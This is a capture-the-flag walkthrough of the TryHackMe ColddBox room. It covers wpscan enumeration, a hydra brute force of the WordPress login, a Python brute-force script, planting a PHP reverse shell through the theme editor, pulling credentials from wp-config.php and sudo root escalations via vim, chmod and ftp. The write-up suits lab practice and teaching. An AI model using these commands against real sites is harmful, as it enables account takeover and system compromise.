ColddBox — TryHackMe Walkthrough
Hello! Today I am solving ‘ColddBox’ on TryHackMe.
This is an easy-rated box which can be compromised by brute forcing the WordPress CMS login.
Room Link: https://tryhackme.com/r/room/colddboxeasy
Let's get started!
I'll start off by adding the target IP address to the /etc/hosts file (as coldd.thm, the hostname used in the commands below).
Step 0: Reconnaissance
To enumerate the host for open ports I'll use Nmap (Network Mapper). Scan the full port range rather than nmap's default port list: SSH turns out to be on a non-standard port, which a default scan can easily miss.
We get 2 open ports; let's enumerate those further.
Brief
- 80/tcp — HTTP — Apache 2.4.18 web server running the WordPress CMS.
- 4512/tcp — SSH — remote shell access, on a non-standard port (the default is 22).
Step 1: Web Exploitation
Let's fire up the browser and check the website for any clues.
Seems like a normal website; nothing fishy in the source code either.
Since it's running WordPress, we can use wpscan
to enumerate the site for crucial information such as usernames and vulnerable plugins or themes, which can then be used to exploit it.
wpscan --url http://coldd.thm -e vp,vt,u -o logs/wpscan -f cli-no-colour
The above command enumerates the CMS for vulnerable plugins (vp), vulnerable themes (vt) and usernames (u), and writes the output to logs/wpscan.
It identifies 4 users, but we'll drop the first one: WordPress doesn't allow spaces in a username, so that entry is a false positive. Let's put the remaining three in users.txt and brute force the login with hydra.
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt coldd.thm -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location' -F
The form string is the POST body of wp-login.php with the username and password substituted in (the submit button's value has to be URL-encoded, hence Log+In). S=Location marks a login as successful when the response carries a Location header, i.e. the 302 redirect to wp-admin that WordPress sends after a valid login, while a failed attempt returns the login form again with a 200. I'm using the -F
switch to stop hydra as soon as a valid credential pair is found.
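To make the hydra condition concrete, here is an added example (my own, not code from the walkthrough) of the same brute force written by hand: it POSTs the four wp-login.php form fields and treats a redirect with a Location header as success, exactly like S=Location. Because the room's target isn't reachable offline, a small mock wp-login.php handler on localhost stands in for it; the account it accepts and the wordlist are constructed for the demo and are not the room's real credentials.

```python
"""Minimal WordPress login brute forcer with hydra's S=Location success test.

The mock target below reproduces WordPress's response shape: a 302 with a
Location header on a correct password, a 200 login page with an error
otherwise. Credentials are constructed for the demo, not the room's.
"""
import http.client
import threading
import urllib.parse
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed: the one account the mock target accepts.
MOCK_VALID = {"hugo": "sunshine"}


def wp_login_body(user, pwd):
    """The POST body, with the same fields as the hydra form string."""
    return urllib.parse.urlencode(
        {"log": user, "pwd": pwd, "wp-submit": "Log In", "testcookie": "1"}
    )


class MockWpLogin(BaseHTTPRequestHandler):
    """Stand-in for wp-login.php with WordPress's real success/failure shape."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("log", [""])[0]
        pwd = form.get("pwd", [""])[0]
        if MOCK_VALID.get(user) == pwd:
            self.send_response(302)
            self.send_header("Location", "/wp-admin/")
            self.end_headers()
        else:
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.end_headers()
            self.wfile.write(b"<div id='login_error'>Error: incorrect password.</div>")

    def log_message(self, fmt, *args):  # silence per-request logging
        pass


def start_mock_server():
    """Bind the mock target to a free localhost port; returns (server, host, port)."""
    srv = HTTPServer(("127.0.0.1", 0), MockWpLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "127.0.0.1", srv.server_port


def login_succeeded(status, headers):
    """hydra's S=Location rule: a redirect carrying a Location header means the login worked."""
    return 300 <= status < 400 and headers.get("Location") is not None


def try_login(host, port, user, pwd):
    """POST one credential pair. http.client does not follow redirects, which is what we want."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(
            "POST", "/wp-login.php", body=wp_login_body(user, pwd),
            headers={"Content-Type": "application/x-www-form-urlencoded"},
        )
        resp = conn.getresponse()
        resp.read()  # drain the body so the connection closes cleanly
        return login_succeeded(resp.status, resp.headers)
    finally:
        conn.close()


def brute_force(host, port, users, passwords, stop_on_first=True):
    """Try every user/password pair; stop_on_first=True mirrors hydra's -F."""
    found = []
    for user in users:
        for pwd in passwords:
            if try_login(host, port, user, pwd):
                found.append((user, pwd))
                if stop_on_first:
                    return found
                break  # this user is done, move on to the next one
    return found


if __name__ == "__main__":
    srv, host, port = start_mock_server()
    try:
        print(brute_force(host, port, ["philip", "hugo"], ["123456", "password", "sunshine"]))
    finally:
        srv.shutdown()
```

Against a real target, point try_login at the host from /etc/hosts and feed brute_force the wpscan usernames and a wordlist; note that the Location test can misfire if something in front of WordPress (a WAF or a login-limiting plugin) answers with its own redirect, so check the first hit by hand before trusting it.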
Gottem! Now let's log in and get access to the CMS.
Now that we have access to the CMS, let's get code execution by planting a malicious PHP reverse shell.
We'll do this from the theme editor (Appearance > Editor): open the active theme's 404 template (404.php) and replace its contents with the reverse shell's code.
Now update the file. This route only exists because file editing hasn't been disabled with DISALLOW_FILE_EDIT in wp-config.php, which is the standard hardening against exactly this.
Step 2: Compromising the system
Now that our malicious reverse shell code is on the web server, set up a netcat listener and then request a page that doesn't exist, so that WordPress renders the 404 template (?p=777 in this case; any non-existent post ID will do).
curl -L http://coldd.thm/?p=777
And we get a shell!
But first, let's stabilise it. Spawn a pty, background the shell, fix the local terminal, foreground it again, and then set TERM inside the new shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
<CTRL + Z>
stty raw -echo; fg
export TERM=xterm
(export TERM=xterm has to be run inside the pty shell; appended with a semicolon after the python3 command it would only execute in the old, dumb shell once the pty shell exits.)
Let's go for the user flag.
It belongs to c0ldd, so we first need a horizontal privilege escalation to that user.
Let's go back to the web application's directory and search the config files for credentials.
Easy catch!
grep -i -n -B 5 -A 5 pass wp-config.php
The database password from wp-config.php is reused for the local account, so let's switch user and grab the first flag.
One down! Let's grab the other one.
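Rather than eyeballing grep output, the credentials can be pulled straight out of the file. The following is an added example (mine, not the walkthrough's) that parses the define() constants WordPress uses in wp-config.php; the sample file body is constructed with made-up values in the real file's layout, and handles both quote styles, optional whitespace and backslash-escaped quotes inside a password.

```python
"""Extract DB_USER / DB_PASSWORD / DB_HOST / DB_NAME from a wp-config.php body.

SAMPLE_WP_CONFIG is constructed for the demo; only its layout matches the
real file, the values are made up.
"""
import re

SAMPLE_WP_CONFIG = r"""<?php
/** The name of the database for WordPress */
define('DB_NAME', 'colddbox');

/** MySQL database username */
define('DB_USER', 'c0ldd');

/** MySQL database password */
define("DB_PASSWORD", "s3cr3t\"quoted");

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

$table_prefix = 'wp_';
"""

# define('KEY', 'VALUE') with either quote style, optional spaces around the
# arguments, and backslash-escaped characters allowed inside the value.
_DEFINE_RE = re.compile(
    r"""define\s*\(\s*(['"])(?P<key>[A-Za-z_][A-Za-z0-9_]*)\1\s*,\s*(['"])(?P<val>(?:\\.|(?!\3).)*)\3\s*\)"""
)


def parse_defines(text):
    """Return {CONSTANT: value} for every string define() in a wp-config.php body."""
    out = {}
    for m in _DEFINE_RE.finditer(text):
        # Undo the escapes PHP string literals need for quotes and backslashes.
        out[m.group("key")] = re.sub(r"\\([\\'\"])", r"\1", m.group("val"))
    return out


def db_credentials(text):
    """Return (user, password, host, dbname), or None if the file lacks the DB constants."""
    d = parse_defines(text)
    try:
        return d["DB_USER"], d["DB_PASSWORD"], d.get("DB_HOST", "localhost"), d["DB_NAME"]
    except KeyError:
        return None


def db_credentials_from_file(path):
    """Same, reading wp-config.php from disk (e.g. the web root on the box)."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return db_credentials(fh.read())


if __name__ == "__main__":
    print(db_credentials(SAMPLE_WP_CONFIG))
```

The credentials are the real finding here: a database password that also works for a local account is the password reuse that turns a web shell into a user shell.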
Step 3: Privilege Escalation
Let's vertically escalate our privileges now.
Right off the bat we'll check which commands the current user can run as root with the sudo -l
command.
3 commands, 3 paths to become root. Let's explore them one by one; any one of them is enough.
Vim
sudo vim -c ':!/bin/bash'
(runs the shell from inside vim, which is already running as root)
chmod
sudo chmod 6777 /bin/bash
/bin/bash -p
(sets the setuid bit on bash; -p stops bash from dropping the elevated effective uid. 4755 would suffice: 6777 also sets setgid and leaves /bin/bash world-writable, a permanent and noisy change, so prefer the other two routes on anything but a lab box.)
ftp
sudo ftp
!/bin/bash
(ftp's ! command escapes to a shell, again inherited from the root ftp process)
Conclusion
ColddBox is an easy-rated room which can be rooted by brute forcing the weak credentials used for the WordPress CMS, followed by password reuse between the database and a local user and a permissive sudo configuration.